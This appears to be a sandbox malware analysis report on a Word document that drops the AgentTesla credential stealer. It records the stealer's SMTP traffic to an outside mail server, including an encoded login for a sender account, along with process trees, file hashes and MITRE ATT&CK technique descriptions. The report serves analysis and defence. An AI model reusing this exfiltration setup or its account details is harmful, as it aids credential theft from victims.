Feb 23, 2021 16:55:30.849620104 CET	49167	587	192.168.2.22	103.35.120.75	MAIL FROM:<ecom8@tpcdel.com>
Feb 23, 2021 16:55:31.054327011 CET	587	49167	103.35.120.75	192.168.2.22	550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)
Feb 23, 2021 16:55:51.257219076 CET	587	49170	103.35.120.75	192.168.2.22	220-pro10.winwinhosting.com ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 21:19:34 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 23, 2021 16:55:51.257775068 CET	49170	587	192.168.2.22	103.35.120.75	EHLO 642294
Feb 23, 2021 16:55:51.453808069 CET	587	49170	103.35.120.75	192.168.2.22	250-pro10.winwinhosting.com Hello 642294 [84.17.52.38] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 23, 2021 16:55:51.454435110 CET	49170	587	192.168.2.22	103.35.120.75	AUTH login ZWNvbThAdHBjZGVsLmNvbQ==
Feb 23, 2021 16:55:51.650553942 CET	587	49170	103.35.120.75	192.168.2.22	334 UGFzc3dvcmQ6
Feb 23, 2021 16:55:53.570527077 CET	587	49170	103.35.120.75	192.168.2.22	535 Incorrect authentication data
Feb 23, 2021 16:55:53.570877075 CET	49170	587	192.168.2.22	103.35.120.75	MAIL FROM:<ecom8@tpcdel.com>
Feb 23, 2021 16:55:53.767194986 CET	587	49170	103.35.120.75	192.168.2.22	550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)
Feb 23, 2021 16:56:03.772083998 CET	587	49171	103.35.120.75	192.168.2.22	220-pro10.winwinhosting.com ESMTP Exim 4.93 #2 Tue, 23 Feb 2021 21:19:47 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 23, 2021 16:56:03.772993088 CET	49171	587	192.168.2.22	103.35.120.75	EHLO 642294
Feb 23, 2021 16:56:03.967884064 CET	587	49171	103.35.120.75	192.168.2.22	250-pro10.winwinhosting.com Hello 642294 [84.17.52.38] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 23, 2021 16:56:03.968130112 CET	49171	587	192.168.2.22	103.35.120.75	AUTH login ZWNvbThAdHBjZGVsLmNvbQ==
Feb 23, 2021 16:56:04.162950993 CET	587	49171	103.35.120.75	192.168.2.22	334 UGFzc3dvcmQ6
Feb 23, 2021 16:56:05.879669905 CET	587	49171	103.35.120.75	192.168.2.22	535 Incorrect authentication data
Feb 23, 2021 16:56:05.880009890 CET	49171	587	192.168.2.22	103.35.120.75	MAIL FROM:<ecom8@tpcdel.com>
Feb 23, 2021 16:56:06.076339960 CET	587	49171	103.35.120.75	192.168.2.22	550 Access denied - Invalid HELO name (See RFC2821 4.1.1.1)

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2472 Parent PID: 584

General

Start time:	16:53:35
Start date:	23/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f6a0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 2300 Parent PID: 584

General

Start time:	16:53:36
Start date:	23/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: twox67345.exe PID: 2292 Parent PID: 2300

General

Start time:	16:53:42
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\twox67345.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\twox67345.exe
Imagebase:	0x910000
File size:	629624 bytes
MD5 hash:	3DC83F17122DD592D607424A54C1E9CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2274734212.000000000368E000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs
Reputation:	low

Analysis Process: cmd.exe PID: 2944 Parent PID: 2292

General

Start time:	16:55:03
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x4a110000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 2996 Parent PID: 2944

General

Start time:	16:55:04
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0x510000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: twox67345.exe PID: 2936 Parent PID: 2292

General

Start time:	16:55:06
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\twox67345.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\twox67345.exe
Imagebase:	0x910000
File size:	629624 bytes
MD5 hash:	3DC83F17122DD592D607424A54C1E9CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: twox67345.exe PID: 2952 Parent PID: 2292

General

Start time:	16:55:06
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\twox67345.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\twox67345.exe
Imagebase:	0x910000
File size:	629624 bytes
MD5 hash:	3DC83F17122DD592D607424A54C1E9CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2360157880.0000000002701000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2358876665.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: UGxXf.exe PID: 2500 Parent PID: 1388

General

Start time:	16:55:18
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
Imagebase:	0xb50000
File size:	629624 bytes
MD5 hash:	3DC83F17122DD592D607424A54C1E9CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2334670047.000000000374E000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs
Reputation:	low

Analysis Process: UGxXf.exe PID: 1836 Parent PID: 1388

General

Start time:	16:55:26
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
Imagebase:	0xb50000
File size:	629624 bytes
MD5 hash:	3DC83F17122DD592D607424A54C1E9CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: cmd.exe PID: 2924 Parent PID: 2500

General

Start time:	16:55:27
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x49e70000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 2984 Parent PID: 2924

General

Start time:	16:55:29
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0xda0000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: UGxXf.exe PID: 648 Parent PID: 2500

General

Start time:	16:55:31
Start date:	23/02/2021
Path:	C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
Imagebase:	0xb50000
File size:	629624 bytes
MD5 hash:	3DC83F17122DD592D607424A54C1E9CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2360028702.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.2358961317.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report payment_advice.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

SMTP Packets

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre